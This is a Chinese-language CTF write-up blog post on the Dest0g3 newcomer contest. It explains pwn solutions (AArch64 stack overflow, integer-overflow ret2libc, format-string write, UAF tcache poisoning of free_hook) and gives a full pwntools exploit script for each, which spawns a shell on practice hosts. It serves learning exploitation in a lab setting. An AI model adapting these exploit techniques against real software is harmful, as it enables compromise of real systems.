<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="John Doe">





<title>Dest0g3迎新赛 | hash_hash的博客</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        <!-- MathJax配置，可通过单美元符号书写行内公式等 -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
    });
</script>
<!-- 给MathJax元素添加has-jax class -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>
<!-- 通过连接CDN加载MathJax的js代码 -->
<script type="text/javascript" async
        src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML">
</script>


    


<meta name="generator" content="Hexo 6.1.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">hash_hash&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/friend">Friends</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">hash_hash&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/friend">Friends</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6;    // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function () {
            tocbot.refresh(obj_merge(tocbot_default_config, { hasInnerContainers: true }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function () {
        tocbot.init(obj_merge(tocbot_default_config, { collapseDepth: 1 }));
    });

    function expandToc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, { collapseDepth: expanded ? 1 : DEPTH_MAX }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">Dest0g3迎新赛</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">John Doe</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">May 25, 2022&nbsp;&nbsp;22:17:25</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/Writeup/">Writeup</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p>Dest0g3的招新题目出的挺友好的，适合各个方向的入门，密码比较简单就不写了，主要是记录一下pwn，收获不少</p>
<p><a target="_blank" rel="noopener" href="https://github.com/hash-hash/pwn/tree/main/pwn%E9%A2%98%E9%99%84%E4%BB%B6/Dest0g3">附件</a></p>
<h2 id="ez-aarch"><a href="#ez-aarch" class="headerlink" title="ez_aarch"></a>ez_aarch</h2><p>arm一种不同于x86的架构，非常适用于移动通信这种低成本，高性能，低耗能的领域，具有两种主要执行状态:AArch64以及AArch32</p>
<p>本题即AArch64，但是不需要太了解这种架构的具体的实现</p>
<p>只需大概了解参数存取和函数返回方式即可</p>
<p>可参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/txx_683/article/details/53930367">文章</a></p>
<p>由于arm结构下函数放回地址仍然存于栈帧上，所以依旧存在栈溢出，check一下保护除了canary均开启</p>
<img src="/2022/05/25/Dest0g3%E8%BF%8E%E6%96%B0%E8%B5%9B/pic1.png" class>

<img src="/2022/05/25/Dest0g3%E8%BF%8E%E6%96%B0%E8%B5%9B/pic2.png" class>

<p>幸运的是我们能在text段找到后门函数且溢出函数的返回地址与后门函数起始段仅有最后一字节不同，采用partial write绕过pie即可</p>
<p>确定返回地址与溢出点偏移的方式就直接盲打，随便输看报错，最后确定偏移是0x28</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">28233</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">40</span>+<span class="string">b&#x27;\x3c&#x27;</span></span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="ez-pwn"><a href="#ez-pwn" class="headerlink" title="ez_pwn"></a>ez_pwn</h2><p>挺好的一个题目，主要考的整型的一些知识，溢出及其储存方式</p>
<p>后面有两个地方的覆盖需要注意，一个是循环次数一个是i，这个点在hgame的时候就有考察，gdb调试一下就会发现问题</p>
<p>最后能覆盖到返回地址，就和ret2libc打法一样</p>
<blockquote>
<p>唯一需要注意的是最后拿到system地址后要注意0x7f的写入，因为v1是int型数组$-2^{31}$到$2^{31}-1$，所以在补码表示下32bits首位可以理解为对$-2^{31}$的加权，即我们需要写入负数来实现system地址的写入</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">25226</span>)</span><br><span class="line"><span class="comment">#p=process(&#x27;./ez_pwn&#x27;)</span></span><br><span class="line">elf=ELF(<span class="string">&#x27;./ez_pwn&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">main=<span class="number">0x08049408</span></span><br><span class="line">puts_plt=<span class="number">0x080490C0</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">addnum</span>(<span class="params">ele</span>):</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;input your choice:\n&#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;input num\n&#x27;</span>,<span class="built_in">str</span>(ele))</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">int_change</span>(<span class="params">n</span>):</span><br><span class="line"> s=<span class="built_in">bin</span>(n)[<span class="number">3</span>:]</span><br><span class="line"> t=<span class="built_in">int</span>(s,<span class="number">2</span>)</span><br><span class="line"> <span class="keyword">return</span> t-<span class="number">2</span>**<span class="number">31</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;input the length of array:\n&#x27;</span>,<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line"> addnum(<span class="number">1</span>)</span><br><span class="line"> </span><br><span class="line">addnum(<span class="number">100</span>)</span><br><span class="line">addnum(<span class="number">1</span>)</span><br><span class="line">addnum(<span class="number">12</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> addnum(<span class="number">10</span>)</span><br><span class="line"></span><br><span class="line">addnum(puts_plt)</span><br><span class="line">addnum(main)</span><br><span class="line">addnum(elf.got[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">p.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;exit!\n&#x27;</span>)</span><br><span class="line">puts=u32(p.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&#x27;puts=&#x27;</span>+<span class="built_in">hex</span>(puts))</span><br><span class="line"></span><br><span class="line">sys=<span class="number">0x3cf10</span></span><br><span class="line">sh=<span class="number">0x17b9db</span></span><br><span class="line">puts_addr=<span class="number">0x67560</span></span><br><span class="line">base=puts-puts_addr</span><br><span class="line">sys+=base</span><br><span class="line">sh+=base</span><br><span class="line">log.success(<span class="string">&#x27;libcbase=&#x27;</span>+<span class="built_in">hex</span>(base))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;input the length of array:\n&#x27;</span>,<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line"> addnum(<span class="number">1</span>)</span><br><span class="line"> </span><br><span class="line">addnum(<span class="number">100</span>)</span><br><span class="line">addnum(<span class="number">1</span>)</span><br><span class="line">addnum(<span class="number">12</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> addnum(<span class="number">10</span>)</span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&#x27;system=&#x27;</span>+<span class="built_in">hex</span>(sys))</span><br><span class="line"><span class="built_in">print</span>(int_change(sys))</span><br><span class="line">addnum(int_change(sys))</span><br><span class="line">addnum(main)</span><br><span class="line">addnum(int_change(sh))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="dest-love"><a href="#dest-love" class="headerlink" title="dest_love"></a>dest_love</h2><p>格式化字符串的读入在bss段上的利用，gdb调试在栈上找到所需要的栈的地址信息</p>
<img src="/2022/05/25/Dest0g3%E8%BF%8E%E6%96%B0%E8%B5%9B/pic3.png" class>

<p>找到如图所示的链式结构，实际上不需要三段两段即可</p>
<p>可参考<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/184717">文章</a>，写的很详细了</p>
<blockquote>
<p>最后我把目标地址写在了ebp上，是因为在调试的过程中没法做到覆盖前两个字节为0，没太整明白为什么，所以就干脆找了个就是0的位置进行覆盖了，实际上写入的时候还是出了点问题，目标地址的低两字节写不进去，就很懵，最后强行gdb调好写了个逻辑不大正常的payload┭┮﹏┭┮</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">29237</span>)</span><br><span class="line"><span class="comment">#p=process(&#x27;./destpwn&#x27;)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">payload1=<span class="string">b&#x27;%16$p%26$p&#x27;</span></span><br><span class="line">p.recv()</span><br><span class="line">p.sendline(payload1)</span><br><span class="line"></span><br><span class="line">elfbase=<span class="built_in">int</span>(p.recv(<span class="number">14</span>)[<span class="number">2</span>:],<span class="number">16</span>)-<span class="number">0x10a0</span></span><br><span class="line">stack1=<span class="built_in">int</span>(p.recv(<span class="number">14</span>)[<span class="number">2</span>:],<span class="number">16</span>)</span><br><span class="line">addr=elfbase+<span class="number">0x4010</span></span><br><span class="line">log.success(<span class="string">&#x27;elfbase=&#x27;</span>+<span class="built_in">hex</span>(elfbase))</span><br><span class="line">log.success(<span class="string">&#x27;addr=&#x27;</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line">log.success(<span class="string">&#x27;stack1=&#x27;</span>+<span class="built_in">hex</span>(stack1))</span><br><span class="line">ebp=stack1-<span class="number">248</span></span><br><span class="line">log.success(<span class="string">&#x27;ebp=&#x27;</span>+<span class="built_in">hex</span>(ebp))</span><br><span class="line"></span><br><span class="line">tmp=<span class="built_in">hex</span>(addr)[<span class="number">2</span>:]</span><br><span class="line">add1=ebp&amp;<span class="number">0xffff</span></span><br><span class="line">aim=addr</span><br><span class="line">tmp=aim&amp;<span class="number">0xffff</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;%&#123;&#125;c%&#123;&#125;$hn%&#123;&#125;c%&#123;&#125;$hn&#x27;</span>.<span class="built_in">format</span>(add1,<span class="number">26</span>,tmp-add1,<span class="number">39</span>)</span><br><span class="line">p.sendafter(<span class="string">&#x27;What about your love to Dest0g3?\n&#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">4</span>):</span><br><span class="line"> tmp=aim&amp;<span class="number">0xffff</span></span><br><span class="line"> <span class="built_in">print</span>(tmp-add1-<span class="number">2</span>*i)</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">hex</span>(add1+<span class="number">2</span>*i))</span><br><span class="line"> payload=<span class="string">&#x27;%&#123;&#125;c%&#123;&#125;$hn%&#123;&#125;c%&#123;&#125;$hn&#x27;</span>.<span class="built_in">format</span>(add1+<span class="number">2</span>*i,<span class="number">26</span>,tmp-add1-<span class="number">2</span>*i,<span class="number">39</span>)</span><br><span class="line"> p.sendafter(<span class="string">&#x27;What about your love to Dest0g3?\n&#x27;</span>,payload)</span><br><span class="line"> aim=aim&gt;&gt;<span class="number">16</span></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;%1314520c%8$n&#x27;</span></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="ezuaf"><a href="#ezuaf" class="headerlink" title="ezuaf"></a>ezuaf</h2><p>发现申请的最大size可以超过fastbin的范围，直接申请9个128大小的chunk释放前八个，由tcache机制可知最后一个会被挂在unsorted bin上，由于uaf漏洞，我们利用读取的功能可以泄露main_arena的值，但是要注意查libc版本最好不要用main_arena低三位去找，原因是默认libc的符号表里不含main_arena，是dbg_sym加上的</p>
<p>所以最后采取通过main_arena确定malloc_hook再用malloc_hook查libc版本，最后打free_hook即可</p>
<blockquote>
<p>一个有意思的点是这里的libc版本大于2.32，所以tcache引入了xor机制，需要先打印堆基址，最后再按该机制的方式伪造chunk即可</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">29057</span>)</span><br><span class="line"><span class="comment">#p=process(&#x27;./uaf&#x27;)</span></span><br><span class="line"><span class="comment">#libc=ELF(&#x27;./2.32-0ubuntu3.2_amd64/libc-2.32.so&#x27;)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size,content</span>):</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;: &#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;size: \n&#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;Content: &#x27;</span>,content)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">del1</span>(<span class="params">index</span>):</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;: &#x27;</span>,<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;index: \n&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">index,content</span>):</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;: &#x27;</span>,<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;index: \n&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;content: \n&#x27;</span>,content)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">index</span>):</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;: &#x27;</span>,<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">&#x27;index: \n&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>):</span><br><span class="line"> add(<span class="number">128</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line"> del1(i)</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">__malloc_hook=u64(p.recv(<span class="number">8</span>))-<span class="number">96</span>-<span class="number">0x10</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">libcbase=__malloc_hook-<span class="number">0x1e0b90</span></span><br><span class="line">sys=libcbase+<span class="number">0x4fa60</span></span><br><span class="line">free_hook=libcbase+<span class="number">0x1e3e20</span></span><br><span class="line">log.success(<span class="string">&#x27;libcbase=&#x27;</span>+<span class="built_in">hex</span>(libcbase))</span><br><span class="line">log.success(<span class="string">&#x27;free_hook=&#x27;</span>+<span class="built_in">hex</span>(free_hook))</span><br><span class="line">log.success(<span class="string">&#x27;system=&#x27;</span>+<span class="built_in">hex</span>(sys))</span><br><span class="line">add(<span class="number">24</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">24</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">24</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">del1(<span class="number">9</span>)</span><br><span class="line">show(<span class="number">9</span>)</span><br><span class="line">heapbase=u64(p.recv(<span class="number">8</span>))</span><br><span class="line">del1(<span class="number">10</span>)</span><br><span class="line">del1(<span class="number">11</span>)</span><br><span class="line">show(<span class="number">11</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">10</span>,p64(free_hook^heapbase))</span><br><span class="line"></span><br><span class="line">add(<span class="number">24</span>,<span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">add(<span class="number">24</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">24</span>,p64(sys))</span><br><span class="line">del1(<span class="number">11</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="ez-kiwi"><a href="#ez-kiwi" class="headerlink" title="ez_kiwi"></a>ez_kiwi</h2><p>最终目的是触发kiwi链，原理搞的不是很清楚，下次一定复现</p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/235598">参考</a></p>
<h2 id="emma"><a href="#emma" class="headerlink" title="emma"></a>emma</h2><p>也是个触发kiwi的，等接下来复现吧</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>John Doe</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://hash-hash.github.io/2022/05/25/Dest0g3%E8%BF%8E%E6%96%B0%E8%B5%9B/">https://hash-hash.github.io/2022/05/25/Dest0g3%E8%BF%8E%E6%96%B0%E8%B5%9B/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/wp/"># wp</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2022/06/04/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E4%B8%8E%E7%AE%97%E6%B3%95/">数据结构与算法</a>
            
            
            <a class="next" rel="next" href="/2022/05/18/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/">2021_0rays新生赛</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© John Doe | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>